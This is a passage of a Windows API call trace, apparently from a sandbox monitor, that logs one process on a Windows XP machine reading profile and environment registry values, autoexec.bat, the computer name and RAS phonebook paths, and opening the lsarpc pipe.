Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xb5F\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegOpenKeyExW |
Handle => 0x00000184 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegQueryValueExW |
Handle => 0x00000184 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\x00\x00 ValueName => ProfileImagePath |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegCreateKeyExW |
Handle => 0x00000184 Access => 131103 Registry => 0x0000017c Class => SubKey => Software\Microsoft\Windows NT\CurrentVersion\Winlogon |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegQueryValueExW |
Handle => 0x00000184 Data => 1\x00\x00\x00 ValueName => ParseAutoexec |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | NtCreateFile |
ShareAccess => 1 FileName => c:\autoexec.bat DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | NtQueryInformationFile |
FileHandle => 0x00000184 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | NtReadFile |
Buffer => FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegOpenKeyExW |
Handle => 0x00000184 Registry => 0x0000017c SubKey => Environment |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 DataLength => 4096 ValueName => TMP Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,386 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,386 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings |
SUCCESS | 0x00164f80 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 DataLength => 4096 ValueName => TMP Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,386 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | RegOpenKeyExW |
Handle => 0x00000184 Registry => 0x0000017c SubKey => Volatile Environment |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => \\x00\\x00T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 ValueName => LOGONSERVER |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => CLIENTNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => SESSIONNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,386 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x00000184 Data => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => APPDATA |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x00000184 Data => C\x00:\x00\x00\x00 ValueName => HOMEDRIVE |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x00000184 Data => \x00\x00 ValueName => HOMESHARE |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x00000184 Data => \\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\x00\x00 ValueName => HOMEPATH |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x00000184 DataLength => 4096 ValueName => HOMEPATH Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000184 Data => \\x00\\x00T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 ValueName => LOGONSERVER |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => CLIENTNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000184 Data => C\x00o\x00n\x00s\x00o\x00l\x00e\x00\x00\x00 ValueName => SESSIONNAME |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x00000184 Data => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => APPDATA |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x00000184 Data => C\x00:\x00\x00\x00 ValueName => HOMEDRIVE |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x00000184 Data => \x00\x00 ValueName => HOMESHARE |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x00000184 Data => \\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\x00\x00 ValueName => HOMEPATH |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x00000184 DataLength => 4096 ValueName => HOMEPATH Type => 12709440 |
FAILURE | 0x00000103 | |
| 07:43:40,396 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x00cd0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,396 | 1308 | RegCreateKeyExW |
Handle => 0x00000174 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegSetValueExW |
Handle => 0x00000174 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => Common AppData Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk |
SUCCESS | 4294967295 | |
| 07:43:40,406 | 1308 | FindFirstFileExW |
FileName => C:\WINDOWS\system32\Ras\*.pbk |
SUCCESS | 4294967295 | |
| 07:43:40,406 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000003 SubKey => S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegCreateKeyExW |
Handle => 0x0000017c Access => 33554432 Registry => 0x00000174 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => AppData |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => System\CurrentControlSet\Control\Session Manager\Environment |
SUCCESS | 0x00000000 | |
| 07:43:40,406 | 1308 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 124 MaxValueNameLength => 22 ValueCount => 13 MaxSubKeyLength => 0 KeyHandle => 0x00000174 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00c\x00m\x00d\x00.\x00e\x00x\x00e\x00\x00\x00 ValueName => ComSpec |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00S\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00W\x00b\x00e\x00m\x00\x00\x00 ValueName => Path |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\x00\x00 ValueName => windir |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x00000174 Data => N\x00O\x00\x00\x00 ValueName => FP_NO_HOST_CHECK |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x00000174 Data => W\x00i\x00n\x00d\x00o\x00w\x00s\x00_\x00N\x00T\x00\x00\x00 ValueName => OS |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x00000174 Data => x\x008\x006\x00\x00\x00 ValueName => PROCESSOR_ARCHITECTURE |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x00000174 Data => 1\x005\x00\x00\x00 ValueName => PROCESSOR_LEVEL |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x00000174 Data => x\x008\x006\x00 \x00F\x00a\x00m\x00i\x00l\x00y\x00 \x001\x005\x00 \x00M\x00o\x00d\x00e\x00l\x00 \x001\x000\x007\x00 \x00S\x00t\x00e\x00p\x00p\x00i\x00n\x00g\x00 \x001\x00,\x00 \x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00A\x00M\x00D\x00\x00\x00 ValueName => PROCESSOR_IDENTIFIER |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 8 Handle => 0x00000174 Data => 6\x00b\x000\x001\x00\x00\x00 ValueName => PROCESSOR_REVISION |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 9 Handle => 0x00000174 Data => 1\x00\x00\x00 ValueName => NUMBER_OF_PROCESSORS |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 10 Handle => 0x00000174 Data => .\x00C\x00O\x00M\x00;\x00.\x00E\x00X\x00E\x00;\x00.\x00B\x00A\x00T\x00;\x00.\x00C\x00M\x00D\x00;\x00.\x00V\x00B\x00S\x00;\x00.\x00V\x00B\x00E\x00;\x00.\x00J\x00S\x00;\x00.\x00J\x00S\x00E\x00;\x00.\x00W\x00S\x00F\x00;\x00.\x00W\x00S\x00H\x00\x00\x00 ValueName => PATHEXT |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 11 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 12 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00c\x00m\x00d\x00.\x00e\x00x\x00e\x00\x00\x00 ValueName => ComSpec |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00S\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00W\x00b\x00e\x00m\x00\x00\x00 ValueName => Path |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\x00\x00 ValueName => windir |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x00000174 Data => N\x00O\x00\x00\x00 ValueName => FP_NO_HOST_CHECK |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x00000174 Data => W\x00i\x00n\x00d\x00o\x00w\x00s\x00_\x00N\x00T\x00\x00\x00 ValueName => OS |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x00000174 Data => x\x008\x006\x00\x00\x00 ValueName => PROCESSOR_ARCHITECTURE |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x00000174 Data => 1\x005\x00\x00\x00 ValueName => PROCESSOR_LEVEL |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x00000174 Data => x\x008\x006\x00 \x00F\x00a\x00m\x00i\x00l\x00y\x00 \x001\x005\x00 \x00M\x00o\x00d\x00e\x00l\x00 \x001\x000\x007\x00 \x00S\x00t\x00e\x00p\x00p\x00i\x00n\x00g\x00 \x001\x00,\x00 \x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00A\x00M\x00D\x00\x00\x00 ValueName => PROCESSOR_IDENTIFIER |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 8 Handle => 0x00000174 Data => 6\x00b\x000\x001\x00\x00\x00 ValueName => PROCESSOR_REVISION |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 9 Handle => 0x00000174 Data => 1\x00\x00\x00 ValueName => NUMBER_OF_PROCESSORS |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 10 Handle => 0x00000174 Data => .\x00C\x00O\x00M\x00;\x00.\x00E\x00X\x00E\x00;\x00.\x00B\x00A\x00T\x00;\x00.\x00C\x00M\x00D\x00;\x00.\x00V\x00B\x00S\x00;\x00.\x00V\x00B\x00E\x00;\x00.\x00J\x00S\x00;\x00.\x00J\x00S\x00E\x00;\x00.\x00W\x00S\x00F\x00;\x00.\x00W\x00S\x00H\x00\x00\x00 ValueName => PATHEXT |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 11 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegEnumValueW |
Index => 12 Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000184 ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | NtQueryValueKey |
Information => T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 KeyHandle => 0x00000184 ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => D\x00e\x00f\x00a\x00u\x00l\x00t\x00 \x00U\x00s\x00e\x00r\x00\x00\x00 ValueName => DefaultUserProfile |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => C\x00:\x00\\x00P\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => ProgramFilesDir |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => C\x00:\x00\\x00P\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00F\x00i\x00l\x00e\x00s\x00\\x00C\x00o\x00m\x00m\x00o\x00n\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => CommonFilesDir |
SUCCESS | 0x00000000 | |
| 07:43:40,416 | 1308 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000003 SubKey => S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | NtSetInformationFile |
FileHandle => 0x00000180 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,426 | 1308 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xb6F\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | NtSetInformationFile |
FileHandle => 0x00000184 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,426 | 1308 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,426 | 1308 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xb7F\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegOpenKeyExW |
Handle => 0x00000184 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegQueryValueExW |
Handle => 0x00000184 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\x00\x00 ValueName => ProfileImagePath |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegCreateKeyExW |
Handle => 0x00000184 Access => 131103 Registry => 0x00000174 Class => SubKey => Software\Microsoft\Windows NT\CurrentVersion\Winlogon |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegQueryValueExW |
Handle => 0x00000184 Data => 1\x00\x00\x00 ValueName => ParseAutoexec |
SUCCESS | 0x00000000 | |
| 07:43:40,436 | 1308 | RegCloseKey |
Handle => 0x00000184 |
SUCCESS | 0x00000000 | |
